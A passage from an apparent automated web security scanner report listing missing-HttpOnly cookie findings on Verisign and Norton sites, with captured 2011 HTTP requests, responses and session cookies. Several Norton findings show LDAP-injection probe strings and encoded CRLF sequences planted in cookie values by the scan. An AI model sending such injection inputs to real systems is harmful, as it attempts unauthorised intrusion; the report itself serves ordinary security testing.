The following cookie was issued by the application and does not have the HttpOnly flag set:
JSESSIONID=0CBB339A5F3FC6CA6B3243DB5693898F.tomcat2; Path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/br_shadow.png HTTP/1.1 Host: vipmobile.verisign.com Proxy-Connection: keep-alive Referer: http://vipmobile.verisign.com/home.v User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; __fds_fp_id__=44590564957.1; TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF; mbox=PC#1315621455064-973488.19#1378695614|check#true#1315623674|session#1315623613171-877153#1315625474; IS3_GSV=DPL-2_TES-1315621562_PCT-1315623642_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315623643.2; __utmb=136906671.1.10.1315623643; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315510044-5-99_0-1-__0_
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 22:03:58 GMT Server: Apache Set-Cookie: JSESSIONID=0CBB339A5F3FC6CA6B3243DB5693898F.tomcat2; Path=/ Accept-Ranges: bytes ETag: W/"3116-1312807392000" Last-Modified: Mon, 08 Aug 2011 12:43:12 GMT Content-Length: 3116 Content-Type: image/png ...[SNIP]...
10.37. http://vipmobile.verisign.com/images/dot.gif
Summary
Severity:
Low
Confidence:
Firm
Host:
http://vipmobile.verisign.com
Path:
/images/dot.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
JSESSIONID=BC68623295528D6637E6ECFE1FA511A9.tomcat2; Path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/dot.gif HTTP/1.1 Host: vipmobile.verisign.com Proxy-Connection: keep-alive Referer: http://vipmobile.verisign.com/home.v User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; __fds_fp_id__=44590564957.1; TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF; mbox=PC#1315621455064-973488.19#1378695614|check#true#1315623674|session#1315623613171-877153#1315625474; IS3_GSV=DPL-2_TES-1315621562_PCT-1315623642_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315623643.2; __utmb=136906671.1.10.1315623643; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315510044-5-99_0-1-__0_
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 22:03:58 GMT Server: Apache Set-Cookie: JSESSIONID=BC68623295528D6637E6ECFE1FA511A9.tomcat2; Path=/ Accept-Ranges: bytes ETag: W/"43-1312807392000" Last-Modified: Mon, 08 Aug 2011 12:43:12 GMT Content-Length: 43 Content-Type: image/gif
10.38. http://vipmobile.verisign.com/images/home_rght_box.gif
Summary
Severity:
Low
Confidence:
Firm
Host:
http://vipmobile.verisign.com
Path:
/images/home_rght_box.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
JSESSIONID=5B016AD80C52B4540E9C0C7B68B7A4D7.tomcat2; Path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/home_rght_box.gif HTTP/1.1 Host: vipmobile.verisign.com Proxy-Connection: keep-alive Referer: http://vipmobile.verisign.com/home.v User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; __fds_fp_id__=44590564957.1; TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF; mbox=PC#1315621455064-973488.19#1378695614|check#true#1315623674|session#1315623613171-877153#1315625474; IS3_GSV=DPL-2_TES-1315621562_PCT-1315623642_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315623643.2; __utmb=136906671.1.10.1315623643; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315510044-5-99_0-1-__0_
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 22:03:58 GMT Server: Apache Set-Cookie: JSESSIONID=5B016AD80C52B4540E9C0C7B68B7A4D7.tomcat2; Path=/ Accept-Ranges: bytes ETag: W/"7996-1312807394000" Last-Modified: Mon, 08 Aug 2011 12:43:14 GMT Content-Length: 7996 Content-Type: image/gif ...[SNIP]...
10.39. http://vipmobile.verisign.com/images/r_shadow.png
Summary
Severity:
Low
Confidence:
Firm
Host:
http://vipmobile.verisign.com
Path:
/images/r_shadow.png
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
JSESSIONID=0F41858F0BA8CAFB3B967BE1BD5FBA25.tomcat2; Path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/r_shadow.png HTTP/1.1 Host: vipmobile.verisign.com Proxy-Connection: keep-alive Referer: http://vipmobile.verisign.com/home.v User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; __fds_fp_id__=44590564957.1; TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF; mbox=PC#1315621455064-973488.19#1378695614|check#true#1315623674|session#1315623613171-877153#1315625474; IS3_GSV=DPL-2_TES-1315621562_PCT-1315623642_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315623643.2; __utmb=136906671.1.10.1315623643; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315510044-5-99_0-1-__0_
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 22:03:58 GMT Server: Apache Set-Cookie: JSESSIONID=0F41858F0BA8CAFB3B967BE1BD5FBA25.tomcat2; Path=/ Accept-Ranges: bytes ETag: W/"2817-1312807394000" Last-Modified: Mon, 08 Aug 2011 12:43:14 GMT Content-Length: 2817 Content-Type: image/png ...[SNIP]...
10.40. http://vipmobile.verisign.com/images/rt_shadow.png
Summary
Severity:
Low
Confidence:
Firm
Host:
http://vipmobile.verisign.com
Path:
/images/rt_shadow.png
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
JSESSIONID=39BCE0979E896FBFC247F406B455ECFD.tomcat2; Path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/rt_shadow.png HTTP/1.1 Host: vipmobile.verisign.com Proxy-Connection: keep-alive Referer: http://vipmobile.verisign.com/home.v User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; __fds_fp_id__=44590564957.1; TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF; mbox=PC#1315621455064-973488.19#1378695614|check#true#1315623674|session#1315623613171-877153#1315625474; IS3_GSV=DPL-2_TES-1315621562_PCT-1315623642_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315623643.2; __utmb=136906671.1.10.1315623643; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315510044-5-99_0-1-__0_
Response
HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 22:03:59 GMT
Server: Apache
Set-Cookie: JSESSIONID=39BCE0979E896FBFC247F406B455ECFD.tomcat2; Path=/
Accept-Ranges: bytes
ETag: W/"3050-1312807394000"
Last-Modified: Mon, 08 Aug 2011 12:43:14 GMT
Content-Length: 3050
Content-Type: image/png

.PNG . ...IHDR....... ......+.l... pHYs............... OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*! .J.!...Q..EE...........Q,.. ...!.........{.k........>...........H3Q5...B............[SNIP]...
10.41. http://vipmobile.verisign.com/images/topleft.gif
Summary
Severity:
Low
Confidence:
Firm
Host:
http://vipmobile.verisign.com
Path:
/images/topleft.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
JSESSIONID=31209521096AE0F9176A973D15DA8603.tomcat2; Path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/topleft.gif HTTP/1.1 Host: vipmobile.verisign.com Proxy-Connection: keep-alive Referer: http://vipmobile.verisign.com/home.v User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; __fds_fp_id__=44590564957.1; TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF; mbox=PC#1315621455064-973488.19#1378695614|check#true#1315623674|session#1315623613171-877153#1315625474; IS3_GSV=DPL-2_TES-1315621562_PCT-1315623642_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315623643.2; __utmb=136906671.1.10.1315623643; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315510044-5-99_0-1-__0_
Response
HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 22:03:59 GMT
Server: Apache
Set-Cookie: JSESSIONID=31209521096AE0F9176A973D15DA8603.tomcat2; Path=/
Accept-Ranges: bytes
ETag: W/"59-1312807394000"
Last-Modified: Mon, 08 Aug 2011 12:43:14 GMT
Content-Length: 59
Content-Type: image/gif

GIF89a.. ..........!.......,...... .......`y. d..Co.[.y...;
10.42. https://vipmobile.verisign.com/fpa/fpa.jsp
Summary
Severity:
Low
Confidence:
Firm
Host:
https://vipmobile.verisign.com
Path:
/fpa/fpa.jsp
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
JSESSIONID=6F5A301A8F818418D8466F49AD192735.tomcat1; Path=/fpa; Secure
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /fpa/fpa.jsp HTTP/1.1 Host: vipmobile.verisign.com Connection: keep-alive Referer: https://vipmobile.verisign.com/home.v User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; mbox=session#1315621455064-973488#1315623602|PC#1315621455064-973488.19#1378693742|check#true#1315621802; IS3_GSV=DPL-2_TES-1315621562_PCT-1315621562_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.11.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315509977-4-99____; JSESSIONID=5B879E00A090344FCA461344644F595F.tomcat1
Response
HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:52:08 GMT
Server: Apache
Set-Cookie: JSESSIONID=6F5A301A8F818418D8466F49AD192735.tomcat1; Path=/fpa; Secure
Keep-Alive: timeout=15
Connection: Keep-Alive
Content-Type: text/javascript
Content-Length: 108420

var urlProtocol = ('https:' == document.location.protocol ? 'https://' : 'http://'); // Customizable variables var hostUri = urlProtocol + "vipmobile.verisign.com/fpa"; var cookieDomain = '.v...[SNIP]...
10.43. http://buy.norton.com/
Summary
Severity:
Information
Confidence:
Certain
Host:
http://buy.norton.com
Path:
/
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:
FIRSTTIME_CV_DATE=Sep-09-2011 14:31:16b8014%250d%250ae956c741f6e; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
COUNTRY=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
LANGUAGE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
PROGRAMID_CREATED_DATE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
PROGRAMID=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
PROGRAM_TYPE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
LASTTIME_CV_DATE=Sep-09-2011 14:31:2053e95%250d%250ad87014f842f; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
PROGRAMID_CREATED_DATE=09-09-2011; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:24 GMT; path=/
PROGRAM_TYPE=UNKNOWN; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:24 GMT; path=/
LASTTIME_CV_DATE=Sep-09-2011 14:37:24; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:24 GMT; path=/
TrafficSourceCookieName=other; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:24 GMT; path=/
OriginalSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:24 GMT; path=/
CurrentSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:24 GMT; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: buy.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Cache-Control: no-cache="set-cookie" Connection: close Date: Fri, 09 Sep 2011 21:37:24 GMT Location: http://buy.norton.com/estore/mf/landingProductFeatures?rdid=3bf0ac89-952a-4b3e-84b4-5a334e35934e1315604244143Set-Cookie: FIRSTTIME_CV_DATE=Sep-09-2011 14:31:16b8014%250d%250ae956c741f6e; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: COUNTRY=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: LANGUAGE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: PROGRAMID_CREATED_DATE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: PROGRAMID=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: PROGRAM_TYPE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:31:2053e95%250d%250ad87014f842f; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: COUNTRY=US; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:24 GMT; path=/ Set-Cookie: LANGUAGE=en; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:24 GMT; path=/Set-Cookie: PROGRAMID_CREATED_DATE=09-09-2011; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:24 GMT; path=/ Set-Cookie: PROGRAMID=; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:24 GMT; path=/Set-Cookie: PROGRAM_TYPE=UNKNOWN; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:24 GMT; path=/ Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:37:24; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:24 GMT; path=/ Set-Cookie: TrafficSourceCookieName=other; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:24 GMT; path=/ Set-Cookie: 
OriginalSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:24 GMT; path=/ Set-Cookie: CurrentSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:24 GMT; path=/ X-Powered-By: Servlet/2.5 JSP/2.1 Content-Length: 413 <html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="http://buy.norton.com/estore/mf/la...[SNIP]...
10.44. http://buy.norton.com/ps
Summary
Severity:
Information
Confidence:
Certain
Host:
http://buy.norton.com
Path:
/ps
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:
FIRSTTIME_CV_DATE=Sep-09-2011 14:31:16b8014%250d%250ae956c741f6e; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
COUNTRY=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
LANGUAGE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
PROGRAMID_CREATED_DATE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
PROGRAMID=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
PROGRAM_TYPE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
LASTTIME_CV_DATE=Sep-09-2011 14:31:2053e95%250d%250ad87014f842f; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
PROGRAMID_CREATED_DATE=09-09-2011; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/
PROGRAM_TYPE=UNKNOWN; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/
LASTTIME_CV_DATE=Sep-09-2011 14:37:23; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/
TrafficSourceCookieName=other; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/
OriginalSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/
CurrentSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ps HTTP/1.1 Host: buy.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Cache-Control: no-cache="set-cookie" Connection: close Date: Fri, 09 Sep 2011 21:37:23 GMT Location: http://buy.norton.com/estore/mf/landingProductFeatures?rdid=18a29e71-5447-4147-9046-865f8a1fce521315604243554Set-Cookie: FIRSTTIME_CV_DATE=Sep-09-2011 14:31:16b8014%250d%250ae956c741f6e; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: COUNTRY=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: LANGUAGE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: PROGRAMID_CREATED_DATE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: PROGRAMID=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: PROGRAM_TYPE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:31:2053e95%250d%250ad87014f842f; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: COUNTRY=US; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/ Set-Cookie: LANGUAGE=en; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/Set-Cookie: PROGRAMID_CREATED_DATE=09-09-2011; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/ Set-Cookie: PROGRAMID=; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/Set-Cookie: PROGRAM_TYPE=UNKNOWN; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/ Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:37:23; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/ Set-Cookie: TrafficSourceCookieName=other; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/ Set-Cookie: 
OriginalSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/ Set-Cookie: CurrentSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/ X-Powered-By: Servlet/2.5 JSP/2.1 Content-Length: 413 <html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="http://buy.norton.com/estore/mf/la...[SNIP]...
10.45. http://buy.norton.com/special-promotions
Summary
Severity:
Information
Confidence:
Certain
Host:
http://buy.norton.com
Path:
/special-promotions
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:
FIRSTTIME_CV_DATE=Sep-09-2011 14:31:16b8014%250d%250ae956c741f6e; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
COUNTRY=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
LANGUAGE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
PROGRAMID_CREATED_DATE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
PROGRAMID=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
PROGRAM_TYPE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
LASTTIME_CV_DATE=Sep-09-2011 14:31:2053e95%250d%250ad87014f842f; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
PROGRAMID_CREATED_DATE=09-09-2011; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/
PROGRAM_TYPE=UNKNOWN; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/
LASTTIME_CV_DATE=Sep-09-2011 14:37:25; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/
TrafficSourceCookieName=other; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/
OriginalSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/
CurrentSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /special-promotions HTTP/1.1 Host: buy.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Cache-Control: no-cache="set-cookie" Connection: close Date: Fri, 09 Sep 2011 21:37:25 GMT Location: http://buy.norton.com/estore/mf/landingPromotion?rdid=4d1e0611-4d59-4d29-9f22-ad1cbf72a98d1315604245447Set-Cookie: FIRSTTIME_CV_DATE=Sep-09-2011 14:31:16b8014%250d%250ae956c741f6e; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: COUNTRY=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: LANGUAGE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: PROGRAMID_CREATED_DATE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: PROGRAMID=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: PROGRAM_TYPE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:31:2053e95%250d%250ad87014f842f; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: COUNTRY=US; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/ Set-Cookie: LANGUAGE=en; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/Set-Cookie: PROGRAMID_CREATED_DATE=09-09-2011; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/ Set-Cookie: PROGRAMID=; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/Set-Cookie: PROGRAM_TYPE=UNKNOWN; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/ Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:37:25; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/ Set-Cookie: TrafficSourceCookieName=other; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/ Set-Cookie: 
OriginalSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/ Set-Cookie: CurrentSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/ X-Powered-By: Servlet/2.5 JSP/2.1 Content-Length: 401 <html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="http://buy.norton.com/estore/mf/la...[SNIP]...
10.46. http://buy.norton.com/support
Summary
Severity:
Information
Confidence:
